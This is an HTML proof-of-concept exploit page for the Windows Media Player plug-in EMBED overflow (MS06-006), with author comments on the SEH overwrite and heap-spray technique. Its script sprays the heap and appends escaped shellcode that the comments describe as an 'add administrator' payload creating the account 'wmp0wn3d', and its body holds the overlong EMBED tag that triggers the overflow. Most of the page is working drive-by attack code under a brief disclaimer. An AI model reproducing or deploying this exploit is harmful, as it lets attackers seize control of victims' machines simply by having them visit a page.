<HTML> <HEAD> <TITLE>WMP Plugin EMBED Exploit</TITLE> <SCRIPT> // Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006) // By Matthew Murphy (mattmurphy@kc.rr.com) // // DISCLAIMER: // // This exploit code is intended only as a demonstration tool for // educational or testing purposes. It is not intended to be used for any // unauthorized or illicit purpose. Any testing done with this tool must // be limited to systems that you own or are explicitly authorized to // test. // // By utilizing or possessing this code, you assume any and all // responsibility for damage that results. The author will not be held // responsible, under any circumstances, for damage that arises from your // possession or use of this code. // // Tested: // Firefox 1.5.0.1 // Windows Media Player 10 // Windows XP SP2 (US) // // The Windows Media Player plug-in for non-Microsoft browsers (Firefox, // Opera, etc.) suffers from an exploitable overflow in its handling of // EMBED tags. Specifically, a very long SRC property on such a tag can // lead to an overflow that will corrupt a structured exception handling // frame. // // The SEH frame is the vector of control that I exploit. Fortunately, // DEP is turned off for non-Microsoft code, so there's no issue there. // That's really a shame, because such a move would've made an already // difficult exploit much harder. // // One of the reasons the exploit is tough is because the overrun buffer // (the SRC attribute) is seriously mangled before it is handled by the // plug-in. In particular, any character with the sign bit set (> 0x7F) // is replaced. // // We could do as the creative wizards like HD Moore suggest and use an // alphanumeric payload with some cute SEH tricks. Let me rephrase: // YOU could do as the creative wizards suggest. Meanwhile, I'm perfectly // content to throw my code in another buffer and get around all the silly // alpha-numeric sanitation. Sure beats devoting hours to beating it // with fancy shellcode, all for a PoC I may never release. // // Instead, I shamelessly ripped a page from Skylined's book and borrowed // (and cleaned up) the heap spraying technique. My heap-spray is a lot // less precise, because the memory layout is a lot more variable. In // my experience, it took a _HUGE_ block allocation to get the heap I // wanted to jump to into a reliably-placed location. Hence the atrocity // of the 16MB of noops below. // // Aside from the character restrictions, this is a standard stack-based // overflow. I simply smash the SEH frame with a pointer to my HUGE heap // block, which consists of a bunch of 0x41 characters. An INC ECX is a // functional noop -- so the box takes the slide down the heap into the // shellcode. The shellcode is a standard Win32 "add administrator" // payload from Metasploit. // // This exploit is a lot of ripping, cleaning and re-implementation, but // that just goes to show how easy it is to write. So... how about that // 'Important' rating? A bit perplexing to rate a "click-and-own" as an // Important... or is it just because nobody would *DARE* run one of those // "Non-Microsoft" browsers on Windows? :-) // Spray the heap var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); do { spray += spray; } while (spray.length < 0x1000000); // If this is successful, you can login as a local admin: // // User: wmp0wn3d // Pass: password spray += unescape( "%uc933%ue983%ud9c9%ud9ee%u2474%u5bf4%u7381%u9713"+ "%u798c%u839b%ufceb%uf4e2%u646b%u9b3d%u8c97%udef2"+ "%u07ab%u9e05%u8def%u1096%u94d8%uc4f2%u8db7%ud292"+ "%ub81c%u9af2%ubd79%u02b9%u083b%uefb9%u4d90%u96b3"+ "%u4e96%u6f92%ud8ac%u9f5d%u69e2%uc4f2%u8db3%ufd92"+ "%u801c%u1032%u90c8%u7078%u901c%u9af2%u057c%ubf25"+ "%u4f93%u5b48%u07f3%uab39%u4c12%u9701%ucc1c%u1075"+ "%u90e7%u10d4%u84ff%u9292%u0c1c%u9bc9%u8c97%uf3f2"+ "%ud3ab%u6d48%udaf7%u63f0%u4c14%ucb02%u7cff%u9ff3"+ "%ue4c8%u65e1%u821d%u642e%uef70%uff14%ue9b9%ufe01"+ "%ua3b7%ubb1a%ue9f9%ubb0d%uffe2%ue91c%ufbb7%ueb14"+ "%ufba7%ua817%uacf3%ufa09%uffe4%uf40e%ue8e5%ub459"+ "%uc8d6%ubb3d%uaab1%uf559%uf8f2%uf759%ueff8%uf718"+ "%ufef0%uee16%uace7%uff38%ue5fa%uf217%uf8e4%ufa0b"+ "%ue3e3%ue80b%ufbb7%ueb14%ufba7%ua817%uacf3%uda56"+ "%uc8d3%u9b79" ); </SCRIPT> </HEAD> <BODY> <EMBED SRC="------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- ---------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHH HHIIIIJJJJKKKKLLLLAAA NNNNOOOOAAA QQQQRRRRSSSSTTTTUUUUV VVVWWWWXXXXYYYYZZZZ00001111222233334444555566667777888 89999.wmv"></EMBED> </BODY> </HTML>